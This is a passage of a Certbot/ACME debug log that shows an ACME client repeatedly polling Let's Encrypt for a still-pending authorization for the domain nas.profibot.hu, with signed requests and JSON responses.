"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUNGbUhMT3F5X1pjNk5IT2dJT3pHQkpfR1pudEJ0cU5GS0lCVmpyREFJU2ciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "cX8zD6sBjp3l0g5Mg3wYDDsqiRio59oVoK2ZzSKSIg7fEgjxcO_FC5tS5HADyMje9Mzu3AbXfU9uEqV7hQEBi85t1v6TradR5KvD1JE4mSWk_xuWNkDtukdEL9cjtj6TLNAAYfiivzt55SSd3smK3NBX_Q90RDdawrXz_pfZN7NVITNcsMsiTMtOBB-YOIErqcpVYH4TO5MhhFbvGfz-FEvdFcFzxnwfFPFaeTDWJTf93ZWZeEqm2CSvo2Qph3bfzKINQj8lGRkuS5TPHarh_LPthulAJWubCBnNm_e80KsApSROAMgUBhBYjQXRG8Gz-bG20pSWX9FwfdpIYDiS9g", + "payload": "" +} +2025-12-25 04:05:04,044:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:04,045:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:03 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJ0F0c8US7gAsK-ZVmH46UgOkbzCrLdx8V50gPmlbEdWY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:04,045:DEBUG:acme.client:Storing nonce: fULB7aUJ0F0c8US7gAsK-ZVmH46UgOkbzCrLdx8V50gPmlbEdWY +2025-12-25 04:05:04,046:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:07,047:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:07,051:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjBGMGM4VVM3Z0FzSy1aVm1INDZVZ09rYnpDckxkeDhWNTBnUG1sYkVkV1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "SL4_FUrHqN-GO642HhrfQ01y67gphF3HkgaLRUCE8Cw971g1smHxCooPETAkgcV2FM375rNwGAFOBlKYgXXh1T_vAcWpzlf-S31bis1BOKENqEbXWN6ObemMi99KANF9EGtSanWLzncGyPm7xgBQUQeo9DN_2ghOY0ehFOXVKmHyGZXLb4Z0PcCSXAhNzKR1tXWdz6uwJ1SiccnsGF6vw0l0fT8YZJhCr9rMZoQFUAgOIUn4817xa1LqwXTTtu4iA1ayMhRyjGw26sntHcs_s4g1yJrrIExo97eBNC3gTxVur339VXJA2GSgqNtXDmV-W4kBFH4QsVehZXJs4VinpQ", + "payload": "" +} +2025-12-25 04:05:07,218:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:07,219:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:07 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEqX5zZDGpTqGEsVhzHPVeGEt8Vltg0ClUSYpH1gy043M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:07,219:DEBUG:acme.client:Storing nonce: 58tS3qjEqX5zZDGpTqGEsVhzHPVeGEt8Vltg0ClUSYpH1gy043M +2025-12-25 04:05:07,220:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:10,221:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:10,225:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXFYNXpaREdwVHFHRXNWaHpIUFZlR0V0OFZsdGcwQ2xVU1lwSDFneTA0M00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "GtKw_m32A0uxZgXtyDSSagZxqesJjbyKHiFzxIuq9i7j7IdllK8-qDs5xdTBVIYQbwuD2UPTCSFiKs-7toUVkoAu0SSfznFtJ1sb8VsuLxKMyLqHKD6yBkldSXObv4olpCSKSOtTQtgRNsoDwdjf2oDDcjCgpS0qvw9nkJCF0_TbjfH3URwDS-IgaYLN6bhnVR1o5q6AuQMqn7EvH_OoYMDI2a4FO6bswX7w-Fs4KR0b_F2lx_J7o3_Ac8ljY874l6pwMhD_hwy_ydSBwxwdLGJ-2BK8m_b14m6q4XuFlcXCt3t5TVq7MlnfrEpE8d_Q16GfnBheCPXh__v8hYWSrw", + "payload": "" +} +2025-12-25 04:05:10,382:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:10,383:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:10 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJVP0Vz96fZwUnBdg6NZXm6BuuH47vVaLOR26Gn2DHA1M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:10,384:DEBUG:acme.client:Storing nonce: fULB7aUJVP0Vz96fZwUnBdg6NZXm6BuuH47vVaLOR26Gn2DHA1M +2025-12-25 04:05:10,384:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:13,385:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:13,389:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlZQMFZ6OTZmWndVbkJkZzZOWlhtNkJ1dUg0N3ZWYUxPUjI2R24yREhBMU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "SQs09hIPYCaQJ20O_es7kd1x1Xo0jr_Gc2jrmHicxgmL-wnx2634G1dAwipI9b6SIBEImorCAbgYSHhuNG1E-QxDxi8NAjaNtU5vedTaGtaL7-v4sh6h80DLw_ttd9uWtxjOBYM9L57YtkxTuiJcmBs82u31fGjv-tUsKKuk25Ra-T8vJRJs9icJ7YRL4TKCTzS7LhyBuXXNkXTuiYhTWE5JQ481BSWnqGbh6ISBdJh8NTHlihxPjyWrr3O6Fcn_LfL43Yjt83-Yb6XQaXubIX4xbyU8GWBNYz-tQu0XkS-LkmYwzzTWClxROwGmoE4XnPAwx8X6EHOhMcjfhGEVMg", + "payload": "" +} +2025-12-25 04:05:13,544:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:13,544:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:13 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjENAupukVAZE2qWyY41KnaRS2Urdd8pWZICgfuWAiXKUE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:13,545:DEBUG:acme.client:Storing nonce: 58tS3qjENAupukVAZE2qWyY41KnaRS2Urdd8pWZICgfuWAiXKUE +2025-12-25 04:05:13,545:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:16,546:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:16,550:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRU5BdXB1a1ZBWkUycVd5WTQxS25hUlMyVXJkZDhwV1pJQ2dmdVdBaVhLVUUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "UphS6iGEc5m-0ZTfrk0KwLj6Wjxzs0cUoDabh1wE8waWpktHHMPr_XOWlag9RQU6y7pONKIneBNxReJzdR7UfKRPN_gtcrSy3UbPAiguSfC2IGMHoPygnstcUX0B7NMtHboUnSKv_TbZcKdVrqMh06QakFpPSYOG_HMaeZeXehJ1tF_LEX6aG0pXm6TzFJAZLgTVlBwjyQtS1dkpOGiYY70ExYboaxzNP0JnxqBnOgACqee2jIC_Nn5Th-DImrrJmdQWZpoN66XV25DCa4eSRSOx1xVuXt1Il7Ociz4VseZvE4uGgiXrW-D39lVXZKTdvRgzmmXywEHU-iScaHRFJQ", + "payload": "" +} +2025-12-25 04:05:16,707:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:16,708:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:16 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE-qg5kgbEKn0IKxUBAZ4wGm2qa59hTWrOcuGD5aynTdU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:16,708:DEBUG:acme.client:Storing nonce: 58tS3qjE-qg5kgbEKn0IKxUBAZ4wGm2qa59hTWrOcuGD5aynTdU +2025-12-25 04:05:16,709:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:19,710:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:19,714:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRS1xZzVrZ2JFS24wSUt4VUJBWjR3R20ycWE1OWhUV3JPY3VHRDVheW5UZFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "bRGoQjC06vX0l4zg65hCxvIAGi1gWKp8Gp46o-JBrZkS00NZzpwDb_nCYrof-F3gBux8SLGjfjgJ0q-6Ueh40A0XW6fi4JbJZ-bBTZ68KOvyziKAcSqaJ5YO6I8eH9XiN_s53BgFzFztyhraJiYEOLcLnYhFYRyMeC8lTUiOYssZ7_qohU_2vlvQvYCOQYA0gulS7U6lttXsM63VspFwkwShFJM8szaeCr4jurIyOvFU3ZVVhYMOrctQ7SW_9RJQ4_-UediwrFGuxhVBowOYwBqcHAw8Jhc7VMwmRt-9M3e4mEnM_eAfhaxml0n-FOh8RcFNNi7rvJUP0fK-SvRYaQ", + "payload": "" +} +2025-12-25 04:05:19,872:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:19,873:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:19 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEuq5kiAVjatXJCUJGg9sQ33ZgVOqLty7npwjK4RTxKas +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:19,873:DEBUG:acme.client:Storing nonce: 58tS3qjEuq5kiAVjatXJCUJGg9sQ33ZgVOqLty7npwjK4RTxKas +2025-12-25 04:05:19,874:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:22,875:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:22,878:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXVxNWtpQVZqYXRYSkNVSkdnOXNRMzNaZ1ZPcUx0eTducHdqSzRSVHhLYXMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "XZ0Qu-8IyQJaRv-Oo5nkyLzfYzmKeHAH8tm-yQ36DohIYFN9Rly0w732VYlLnM2Kb727IxzUR-OzqBd1Ovbltc4LMCmaG9JStagq5LbtEnVkP0u7lp1QuwH1h821xoxuMa6qcMxDjoYcepkct28fciHuHgNwvyp-Mz78z_BYAIF_qQK3GFO803PpFZHL55oGpqLrb2l-dC2V5CW-Ff9l8mUxYNcGuqw4SJrbC-8_xknDMt9sHY2TOnC043TMChAZ4A-QeeGCs2Fg2wKKkwSUscq84KOX7v9a9jWyVCt0f171Q77lj545UL39By6-CqWSn3RWJapmyNBAxW3lSP1TIw", + "payload": "" +} +2025-12-25 04:05:23,037:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:23,038:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:22 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjExujOxzSlAKmO0-L6vo7fm7E-gcXodYbehfeLVD-_NOE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:23,038:DEBUG:acme.client:Storing nonce: 58tS3qjExujOxzSlAKmO0-L6vo7fm7E-gcXodYbehfeLVD-_NOE +2025-12-25 04:05:23,039:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:26,040:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:26,044:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXh1ak94elNsQUttTzAtTDZ2bzdmbTdFLWdjWG9kWWJlaGZlTFZELV9OT0UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "AlkCmzrkSR1i4opo_zc4JDv-d1xH13Erk9RqEuKVGqCU9hbIccJLQqujn8Hl8hrYZBEuvDD_otqYh89rG380CFN9UjDW8nYkWjw7uoF4InC2ie_icZEBBFy3CJ5WFF0n-zEsL6tkRghzQnVqN-0Yk_SY98-3Kl6lHq-BzQxZwfp4bScxsgTEbqYoGoN7zvU-CNF8LVnQe5v3MR1mZlFB2ZxfHixa4TO1zIKUmI5SX_My2sRY4V6P3lDIRAEEaVy3uw6R-WaMR6p1XnYcrq5HOFKi-h5Q2YLNopLlrsmzj7EgH8ms-p9G9LOUjN1Cl4pjT588cMu_np8_27PkT2W0KQ", + "payload": "" +} +2025-12-25 04:05:26,276:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:26,277:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:26 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEsl359Zuu0JZdfInq6vv6xsTn4wBO_n_gKplXLpQaKBs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:26,277:DEBUG:acme.client:Storing nonce: 58tS3qjEsl359Zuu0JZdfInq6vv6xsTn4wBO_n_gKplXLpQaKBs +2025-12-25 04:05:26,278:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:29,279:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:29,283:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXNsMzU5WnV1MEpaZGZJbnE2dnY2eHNUbjR3Qk9fbl9nS3BsWExwUWFLQnMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "QJ0w_Y8IkJjk1PtgrqZyKv780wW6QzR_H9oei5UBnO5PDqGD3xgwdMGAJjcT9XeYv3Zt_tJ9LCNUMq9JdGcFUgpNf7qkbIZBt-e58hNtcNC5EiunyLD3XcEFeD9L-TwTsMOvRH5OW2mMe9QIDqZmIn9K6_PyqnFYcvIbj34zjO-H0pGCOKqDA4rviRZ4P4kq3mGH2UCfprm-VGNCzZ4hUQzjZD0uPTW13fA-ZM9JYAw-nXVibo4YA7Xe6AFa9wAjO7hhRkeJUov-lSwrZkMSvE7-yCfDDCYuhVDLmSt7tGp_5OaL4ZR30bhgyWCgiZWrIaycsWmyRrjQ1cgFp8ubSw", + "payload": "" +} +2025-12-25 04:05:29,440:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:29,440:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:29 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 